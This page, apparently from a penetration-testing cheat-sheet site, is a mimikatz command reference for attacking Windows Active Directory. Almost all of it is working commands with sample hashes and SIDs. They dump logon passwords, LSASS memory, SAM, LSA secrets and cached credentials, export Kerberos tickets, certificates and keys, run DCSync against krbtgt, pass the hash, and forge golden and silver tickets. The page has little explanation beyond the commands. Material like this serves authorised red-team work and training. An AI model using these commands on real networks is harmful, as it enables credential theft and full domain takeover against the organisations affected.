👾
ctrl-z
  • 👋Welcome to ctrl-z
  • Cheat Sheets
    • Helpful Command QR
    • Footprinting
    • Information Gathering
    • File Transfers
    • LFI
    • MetaSploit
      • Using msfconsole
      • Creating Metasploit Payloads
    • Shells
      • Shells and Payloads
      • Shell Cheatsheet
    • Password Attacks
    • Attacking Common Services
    • Pivoting & Port Forwarding
    • Web Attacks
      • SQL
        • MySQL & SQLi
        • SQLmap
      • Fuzzing w FFUF
      • Bruteforce w Hydra
      • XSS
    • Active Directory
      • Intro to AD
      • AD Enum&Attack
      • RPC-Client
      • 🥝mimikatz
      • NTLM Relay Attacks
    • 💢Buffer Overflow
    • Priv Esc
      • Linux Priv Esc
      • Windows Priv Esc
        • mimikatz
  • Tools
    • Containers
      • Kubernetes
      • Container Testing Methodology
      • Dropping Kali in your test space
    • Cloud
      • aws cli
    • Command Line
      • Linux Basic CML
      • Windows CML
      • Mac CML
    • Redteam & C2
      • Covenant C2
    • JS Deobuscation
    • Crackmapexec
  • Scripts
    • Priv Esc
  • Loot
  • Write Ups
    • Inject (active at the time)
Powered by GitBook
On this page
  • mimikatz
  • general
  • sekurlsa
  • kerberos
  • crypto
  • vault & lsadump
  • pth
  • ekeys
  • dpapi
  • minidump
  • ptt
  • golden/silver
  • tgt
  • purge
  1. Cheat Sheets
  2. Active Directory

mimikatz

mimikatz

general

privilege::debug
log
log customlogfilename.log

sekurlsa

sekurlsa::logonpasswords
sekurlsa::logonPasswords full
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export

vault & lsadump

vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local

pth

sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe

ekeys

sekurlsa::ekeys

dpapi

sekurlsa::dpapi

minidump

sekurlsa::minidump lsass.dmp

ptt

kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

golden/silver

kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

tgt

kerberos::tgt

purge

kerberos::purge
PreviousRPC-ClientNextNTLM Relay Attacks

Last updated 1 year ago

🥝